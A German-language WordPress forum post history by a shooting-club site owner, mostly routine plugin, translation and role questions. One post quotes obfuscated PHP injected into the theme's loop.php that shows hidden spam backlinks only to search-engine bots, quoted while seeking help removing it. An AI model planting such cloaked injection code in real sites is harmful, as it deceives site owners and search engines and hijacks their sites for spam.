Beiträge von KMGTB

    In das WordPress Verzeichnis navigieren, dann den Ordner wp-content und dann den Ordner Plugins öffnen. Den Ordner des Plugins das du deaktivieren möchtest umbenennen. Danach im Browser deinen Cache löschen und mit Strg + F5 deine Seite neu laden.

    Hallo Melewo,

    ja das ist jetzt eine gute Frage wie das eingeschleust wurde. Ich habe nun mal einen Tracker für die Logins der Admins ins Backend installiert. Kann man sonst noch etwas tun um das Loch zu finden?

    Außerdem werde ich jetzt noch mal alle Dateien durchgehen und prüfen ob Sie im Vergleich zum Original anders sind.

    Danke!

    Ich wollte zwar eigentlich meinen Beitrag editieren, aber das scheint in diesem Forum nicht gewollt zu sein.

    Ich habe den Schadcode in der Datei "loop.php" ausfindig gemacht. Hier mal der Übeltäter:

    PHP
    <?php 
    $x0d="<!-- /.article -->"; 
    $x0b = $_SERVER['HTTP_USER_AGENT'];$x0c="\040\x0d\x0a<\141 \150re\x66\075'\150t\x74\x70\072//\x77\167\x77\056\0610\x30\061\146\x72\145e\167\160\164\x68\x65\155\145s\056c\157\155/\x63\x61t\145go\162\x79/\145l\145\147\x61n\164-\x74\x68e\x6d\145\x73\x2f\x20'\076 \x57\157\x72d\x50\x72\x65\x73\163\x20\124h\145mes\074/\x61\x3e
    \x0a\x3c\x61\040\x68\x72ef\x3d'\x68\164\x74\x70:\057/\167ww\056\146r\x65\145\x73\x65\x78x\170\143\x68\x61\164.\143\157\155\040'>\x20\163\x65x\x20ch\141\x74 s\150\x6fw\074\x2fa>
    \x0a\074\x61\040\x68\162\145\146\x3d'h\x74\164p\072\057\x2f\x77\x77w\x2eso\x6ce\164\141\x2e\162\157\x20'\076\x20wo\157\144\040\x68\157u\x73\x65\x20\x68\157\x6d\x65\163\074\057\141>\x0d
    <\141\040\x68\x72\145\x66\x3d'\150\164tp:/\x2fw\x77w\x2e\151\x74\x65\170\143\154\x75s\x69\x76\x2e\x72\x6f '> \x63\x72ear\145\x20s\x69\x74\145\x3c\057\x61>\015\012\011\x09";if ($x0d('*bot*', $x0b)) { echo $x0c;} else {echo '';}?>

    Danke für die Hilfe r23!

    Grüße KMGTB

    Hallo r23,

    danke erst mal für deine Antwort.

    Zu Punkt 1: Nein das habe ich nicht. Wie heißt denn das entsprechende Plugin?

    Zu Punkt 2: Gehe ich recht in der Annahme das diese Maßnahmen dazu dienen vor dem Betreiber der Webseite den Anschein zu wahren das die Seite völlig frei von ungewollten Links ist, jedoch beim Google Bot Backlinks generiert? Außerdem würde mich interessieren wie ich den Schadcode ausfindig mache und lösche.

    Danke

    KMGTB

    Hallo,

    ich habe folgendes Problem:

    Gestern habe ich den Text "Schützenverein Uthleben" in Google gesucht und hatte auch meine Seite als ersten Treffer. Soweit so gut, wenn man nun aber mal auf den kleinen Pfeil rechts neben dem Treffer anklickt und den Google Cache aufruft sieht man unter dem letzten Beitrag komische Links zu einer WordPress Theme Seite und einigen Seiten mit einer RO TLD.

    Ich habe natürlich gleich meine Seite im Original geprüft mit: eingeloggt, ausgeloggt (Besucher), anderer Browser, AdBlock Plugin des Browsers aus. Aber die Links werden auf der Original Seite nicht angezeigt. Auch die ganze MySql Datenbank habe ich nach Teilen der Domains durchsucht aber erhielt null Treffer und auch in den entsprechenden Templates des Themes waren keine Einträge.

    Wie kommt das zustande und was hab ich eventuell noch nicht geprüft, denn irgendwo muss Google ja die Einträge her haben.

    Danke

    Hallo LSL,

    lade dir das Plugin CodeStyling Localization herunter. Danach wählst du im Dashboard unter dem Punkt Werkzeuge den Unterpunkt Lokalisierung.

    Dann erscheint eine Seite auf der deine vorhandenen Sprachdatein angezeigt werden. Bei Typ müsste ganz oben Wordpress angezeigt werden. Falls nicht such es. Dann wählst du bei den Buttons rechts "Bearbeiten", "Einlesen" & "Löschen" den Button "Bearbeiten."

    Du findest nun die Sprachdatei von Wordpress links im Original und Rechts übersetzt ins deutsche vor. In das Eingabefeld neben Übersetzung: gibst du nun ein Benutzename.

    Es wird ein Datensatz gefunden und du klickst auf Bearbeiten ganz rechts neben dem Datensatz. Im erscheinenden Fenster kannst du dann aus Benutzename ein Benutzername machen.

    Danke übrigens für den Hinweis. Ist mir nie aufgefallen!

    Hallo,

    ich habe ein Wordpress System zu finden unter:

    http://schuetzenverein-uthleben.de

    Ich nutze die Webseite zur Vorstellung des Vereins im Internet und habe dazu mehrere Plugins installiert die nötig waren um Funktionen die der Verein braucht umzusetzen.

    Da die Rollen von den Rechten schon recht gut gepasst haben musste ich Sie mit dem Role Editor nur umbenennen. Editor zu Vorstand und Contributor zu Mitglied.

    Bei den Mitgliedern werden jetzt ein Einträge von folgenden Plugins angezeigt obwohl die Rechte so eingestellt sind das Sie dort eh nichts verändern können. Was ich bereits probiert habe um Sie auszublenden folgt gleich. Zunächst die Plugins:


    • Contact Form 7
    • Birthday Widget
    • WP Calendar

    Versuche die nicht funktionierten:

    Adminimize, Admin Menu Editor, WPFront User Role Editor (Hier finde ich keine Rechte für diese Plugins) und Code Anpassungen in der functions.php des Themes.

    Aufgefallen ist mir das alle Einträge über die admin.php aufgerufen werden. Ob das was damit zu tun hat weiß ich nicht.

    Ich weiß nicht mehr weiter,

    vielleicht kann mir ja jemand weiterhelfen.

    Danke